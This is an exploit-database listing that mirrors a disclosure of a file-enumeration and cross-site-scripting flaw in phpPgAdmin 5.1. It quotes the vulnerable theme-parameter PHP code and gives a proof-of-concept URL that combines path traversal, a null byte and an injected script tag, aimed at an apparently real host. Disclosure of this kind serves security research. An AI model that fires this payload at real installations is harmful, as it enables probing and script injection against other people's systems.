Advertisement






phpPgAdmin-5.1 file enumeration && XSS

CVE Category Price Severity
CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2019-08-22
CPE
cpe:cpe:/a:phppgadmin:5.1
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L 0.7 0.999

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019080109

Below is a copy:

phpPgAdmin-5.1 file enumeration && XSS
#Exploit Title: phpPgAdmin-5.1 file enumeration && XSS
#Exploit Author: Krzysztof Rurka
#Vendor Homepage: https://sourceforge.net/projects/phppgadmin/?source=typ_redirect
#Software Link: https://sourceforge.net/projects/phppgadmin/?source=typ_redirect
#Version: 5.1
#CVE:n/a

..\phpPgAdmin-5.1\libraries\lib.inc.php [102]

...
if (isset($_REQUEST['theme']) && is_file("./themes/{$_REQUEST['theme']}/global.css")) {
/* save the selected theme in cookie for a year */
setcookie('ppaTheme', $_REQUEST['theme'], time()+31536000);
$_theme = $_SESSION['ppaTheme'] = $conf['theme'] = $_REQUEST['theme'];
}
...

THX: Ten eksploit dedykuj wujkowi Andejowi, dziki tobie posiadm t niezwyk wiedz na temat XSS-w

POC: http://psql.media4u.home.pl/psql/?theme=../index.php%00"/><script>alert(1)</script>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum